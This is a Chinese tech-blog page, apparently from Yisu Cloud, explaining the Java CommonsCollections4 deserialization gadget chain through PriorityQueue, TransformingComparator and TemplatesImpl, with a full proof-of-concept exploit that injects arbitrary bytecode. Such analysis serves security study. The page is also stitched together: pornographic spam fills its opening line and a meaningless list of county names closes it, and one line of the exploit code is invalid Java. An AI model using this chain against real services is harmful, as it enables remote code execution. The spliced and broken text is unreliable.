亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

java安全之CommonsCollections4怎么應用

發布時間:2022-08-18 09:24:32 來源:億速云 閱讀:175 作者:iii 欄目:開發技術

這篇文章主要介紹“java安全之CommonsCollections4怎么應用”的相關知識,小編通過實際案例向大家展示操作過程,操作方法簡單快捷,實用性強,希望這篇“java安全之CommonsCollections4怎么應用”文章能幫助大家解決問題。

    引子

    CC4簡單來說就是CC3前半部分和CC2后半部分拼接組成的,對于其利用的限制條件與CC2一致,一樣需要在commons-collections-4.0版本使用,原因是TransformingComparator類在3.1-3.2.1版本中還沒有實現Serializable接口,無法被反序列化。

    PriorityQueue

    PriorityQueue是一個優先隊列,作用是用來排序,重點在于每次排序都要觸發傳入的比較器comparator的compare()方法 在CC2中,此類用于調用PriorityQueue重寫的readObject來作為觸發入口

    PriorityQueue中的readObject間接調用了compare() 而compare()最終調用了transform()

    readobject()方法

    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();
        // Read in (and discard) array length
        s.readInt();
        queue = new Object[size];
        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();
        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }

    重寫了該方法并在最后調用了heapify()方法,我們跟進一下:

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

    這里的話需要長度等于2才能進入for循環,我們要怎樣改變長度呢。

    這里用到的是該類的add方法,將指定的元素插入此優先級隊列。

    heapify()調用了siftdown()方法

    繼續跟進:

    private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

    可以看到判斷條件

     if (comparator != null)

    調用了

    siftDownUsingComparator(k, x);

    在siftDownUsingComparator()又調用了 comparator.compare()。

    TransformingComparator

    可以看到該類在CC3的版本中不能反序列化,在CC4的版本中便可以了。

    TransformingComparator是一個修飾器,和CC1中的ChainedTransformer類似。

    TransformingComparator里面存在compare方法,當我們調用時就會調用傳入transformer對象的transform方法具體實現是this.transformer在傳入ChainedTransformer后,會調用ChainedTransformer#transform反射鏈。

    問題

    1.就像剛才heapify里面所說的

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

    我們要進入循環要修改值,通過add方法。

    priorityQueue.add(1);
    priorityQueue.add(2);

    2.initialCapacity的值要大于1

    3.comparator != null

    4.通過反射來修改值防止在反序列化前調用,就如之前的鏈一樣,我們到利用時再用反射修改參數。

    類似這個樣子:

    Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);

    我們先放置個反序列化前不會執行這條鏈的隨便一個參數:

    TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

    POC

    package ysoserial;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    import javassist.convert.TransformWriteField;
    import org.apache.commons.collections4.Transformer;
    import org.apache.commons.collections4.comparators.TransformingComparator;
    import org.apache.commons.collections4.functors.ChainedTransformer;
    import org.apache.commons.collections4.functors.ConstantTransformer;
    import org.apache.commons.collections4.functors.InstantiateTransformer;
    import org.apache.commons.collections4.functors.InvokerTransformer;
    import org.apache.commons.collections4.map.LazyMap;
    import org.apache.xalan.xsltc.trax.TrAXFilter;
    import javax.xml.crypto.dsig.Transform;
    import javax.xml.transform.Templates;
    import java.io.*;
    import java.lang.reflect.*;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.HashMap;
    import java.util.Map;
    import java.util.PriorityQueue;
    public class cc4 {
        public static void main(String[] args) throws Exception {
            TemplatesImpl templates=new TemplatesImpl();
            Class tc=templates.getClass();
            Field nameField=tc.getDeclaredField("_name");
            nameField.setAccessible(true);
            nameField.set(templates,"XINO");
            Field bytecodesField=tc.getDeclaredField("_bytecodes");
            bytecodesField.setAccessible(true);
            byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
            byte[][] codes=[code];
            bytecodesField.set(templates,codes);
            Field tfactoryField=tc.getDeclaredField("_tfactory");
            tfactoryField.setAccessible(true);
            tfactoryField.set(templates,new TransformerFactoryImpl());
            InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
            //
            Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
            };
            ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
            TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
            PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
            priorityQueue.add(1);
            priorityQueue.add(2);
            Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);
            serialize(priorityQueue);
            unserialize("ser.bin");
        }
        public static void serialize(Object obj) throws Exception{
            ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oss.writeObject(obj);
        }
        public static void unserialize(Object obj) throws Exception{
            ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
            oss.readObject();
        }
    }

    關于“java安全之CommonsCollections4怎么應用”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識,可以關注億速云行業資訊頻道,小編每天都會為大家更新不同的知識點。

    向AI問一下細節

    免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

    AI

    嘉禾县| 南投市| 长春市| 扶风县| 乌海市| 左云县| 安新县| 永清县| 白朗县| 卢氏县| 涿州市| 宜兰县| 桐梓县| 句容市| 英吉沙县| 桐柏县| 千阳县| 松溪县| 习水县| 广宗县| 长兴县| 六枝特区| 海伦市| 枣庄市| 竹溪县| 枣阳市| 县级市| 石景山区| 海安县| 孟州市| 黑水县| 青州市| 宁夏| 北票市| 洛浦县| 寿阳县| 津南区| 陆河县| 临海市| 河西区| 平阴县|